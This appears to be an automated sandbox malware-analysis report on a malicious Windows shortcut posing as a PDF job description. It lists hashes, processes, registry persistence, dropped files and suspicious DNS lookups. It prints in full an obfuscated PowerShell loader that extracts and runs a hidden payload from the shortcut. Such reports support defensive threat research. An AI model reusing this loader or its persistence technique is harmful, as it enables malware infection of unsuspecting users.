| File name: | Setup.exe |
| Full analysis: | https://app.any.run/tasks/15b45814-09ca-42b1-886f-3e4fa15db58a |
| Verdict: | Malicious activity |
| Analysis date: | March 15, 2024, 09:17:32 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Has Description string, Has command line arguments, Icon number=13, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized |
| MD5: | 8E37E230E3707CED709DC00DCBFD2ABF |
| SHA1: | 06D311A6DB6CA9A6BCF15630BE7E9C6CE8098DA4 |
| SHA256: | 2D83B80D9645B3A871FA5BEE4FF74E47926E053A4B64F15ED1725E89D2099B5B |
| SSDEEP: | 3072:tMGwx6nZ7tKPUqDnr06tMThIKLHuxJAXjEVvQwmJnjF/09bV2h/QsaUV7ZTphvCu:hnZ7IUqfrMnLOQXwQwcT6Wd1hvCaVt |
| .lnk | Windows Shortcut (100) |

| Flags: | Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 13 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| Description: | Type: Text Document Size: 391,2KB KB Date modified: 30/11/2024 14:56 |
| CommandLineArguments: | --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = '%TMP%\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf |
| IconFileName: | %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1192 | cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf | C:\Windows\System32\cmd.exe | — | conhost.exe | |||||||||||
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) | | | |
| 1404 | "C:\WINDOWS\system32\conhost.exe" --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf | C:\Windows\System32\conhost.exe | — | explorer.exe | |||||||||||
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) | | | |
| 1912 | powershell -windowstyle hidden Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk | Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk | where-object {$_.length -eq 00196182} | Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force | Out-Null;& .\Setup.exe;& .\*.pdf | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) | | | |
| 2012 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | Acrobat.exe | |||||||||||
| | User: admin; Company: Adobe Systems Incorporated; Integrity Level: LOW; Description: Adobe AcroCEF; Exit code: 0; Version: 23.1.20093.0 | | | |
| 2432 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
| | User: admin; Company: Adobe Systems Incorporated; Integrity Level: LOW; Description: Adobe AcroCEF; Exit code: 0; Version: 23.1.20093.0 | | | |
| 2720 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2136 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | AcroCEF.exe | ||||||||||||
| | User: admin; Company: Adobe Systems Incorporated; Integrity Level: LOW; Description: Adobe AcroCEF; Exit code: 0; Version: 23.1.20093.0 | | | |
| 3052 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --first-renderer-process --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2400 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
| | User: admin; Company: Adobe Systems Incorporated; Integrity Level: LOW; Description: Adobe AcroCEF; Exit code: 0; Version: 23.1.20093.0 | | | |
| 3532 | "C:\Users\admin\AppData\Local\Temp\Setup.exe" | C:\Users\admin\AppData\Local\Temp\Setup.exe | powershell.exe | ||||||||||||
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Device Census; Exit code: 0; Version: 10.0.19645.1016 (WinBuild.160101.0800) | | | |
| 3816 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2584 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
| | User: admin; Company: Adobe Systems Incorporated; Integrity Level: LOW; Description: Adobe AcroCEF; Exit code: 0; Version: 23.1.20093.0 | | | |
| 3868 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2600 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
| | User: admin; Company: Adobe Systems Incorporated; Integrity Level: LOW; Description: Adobe AcroCEF; Exit code: 0; Version: 23.1.20093.0 | | | |

| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 1912 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts | write | Acrobat.Document.DC_.pdf | 0 |
| 1912 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids | write | Acrobat.Document.DC | |
| 1912 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
| 1912 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
| 1912 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
| 1912 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0 |
| 6360 | Acrobat.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934 | write | DisplayName | Adobe Acrobat Reader Protected Mode |
| 3532 | Setup.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | write | EdgeMicrosoft | C:\Users\Public\Edge\MicrosoftEdgeUpdate.exe |
| 6592 | Acrobat.exe | HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection | write | bLastExitNormal | 0 |
| 6592 | Acrobat.exe | HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement | write | bSynchronizeOPL | 0 |


| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2vyrke5r.0ad.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\[Update JD] - Product Owner - export202401285675645456645645344556743412331486786463453454888.pdf | | 85E03AE1AA0CF405B96AEC63F401702F | E45E70BB3B0A521A43600B2AE5A754C505104049A2EB19CC221F98500D6CBDA8 |
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\dcntel.dll | executable | CE31B83605EBCFC4DDB0C740192D8FE6 | BB1B01978148310192D46AECF0FBCA9B1CD57043250F8EAFD1D316730518FFC2 |
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Setup.exe | executable | D1B722A188C84E5059765FA87E8C5F32 | 1041623963E1A109B80312CBFE4DC4544CBAC478C2EB2597CA040E1C78585A3E |
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\tmp1425079198.zip | compressed | 6C05F335CAFB13FC0CD065EEF8F23887 | 2FBF876A10B2684BCBFCC0E69A2C89024E5AB276243FD06C4EBCC6B2F464F70C |
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a0iu3ads.gr1.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 94FF6F29E964D6A33A199D64D412BC35 | 0C62D58DD47F1EA0C0A098A45E5DBE190B094C87472919D3A401895254193F77 |
| 6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\ACROBAT_SBX\ACRONGLLOG.TXT | text | E76040843F10E6ABE2422D4D38BCA97E | 9BCEAF5B9B999FF09A4D0410BE0A01E5DB313FC5C23084D4786DE6D3D6BE4D8B |
| 6592 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING | mp3 | DC84B0D741E5BEAE8070013ADDCC8C28 | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
| 6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\ADOBE\ACROBAT\DC\SHAREDDATAEVENTS | sqlite | 138FF48CF99ABB957CB07D3C44918D71 | 29078610DA7C3A129662CF431FD16C2DF60C7D644885DDB5A3272901C94CA0E4 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/2024/3/OwnerAPI/Rdr.txt | unknown | html | 357 b | unknown |
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/2024/3/UC/Other.txt | unknown | html | 353 b | unknown |
4272 | AdobeARM.exe | GET | 200 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt | unknown | text | 4 b | unknown |
4272 | AdobeARM.exe | GET | 200 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/ProcessMAU.txt | unknown | text | 4 b | unknown |
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/11/adnme/NoValidReasonForAdnme.txt | unknown | html | 368 b | unknown |
1088 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 314 b | unknown |
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
4352 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
4272 | AdobeARM.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | binary | 471 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4828 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
3996 | svchost.exe | 20.190.160.17:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1280 | MoUsoCoreWorker.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2720 | AcroCEF.exe | 23.43.60.134:443 | geo2.adobe.com | Akamai International B.V. | US | unknown |
4272 | AdobeARM.exe | 2.22.242.136:80 | acroipm2.adobe.com | Akamai International B.V. | DE | unknown |
5904 | svchost.exe | 88.221.124.138:443 | armmf.adobe.com | AKAMAI-AS | DE | unknown |
2720 | AcroCEF.exe | 34.237.241.83:443 | p13n.adobe.io | AMAZON-AES | US | unknown |
3996 | svchost.exe | 40.126.32.68:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
1088 | backgroundTaskHost.exe | 2.19.96.19:443 | www.bing.com | Akamai International B.V. | DE | unknown |
Domain | IP | Reputation |
|---|---|---|
NGlzOiV5LX2wNWZvNyF.ns1.truecorps.co.th | | unknown |
IVEGH3IKFX3PI1wNHlwV.ns1.truecorps.co.th | | unknown |
geo2.adobe.com | | whitelisted |
acroipm2.adobe.com | | whitelisted |
armmf.adobe.com | | whitelisted |
p13n.adobe.io | | whitelisted |
ocsp.digicert.com | | whitelisted |
IVEGH3IKFX3PI1wNHlwV.ns2.truecorps.co.th | | unknown |
www.bing.com | | whitelisted |
arc.msn.com | | whitelisted |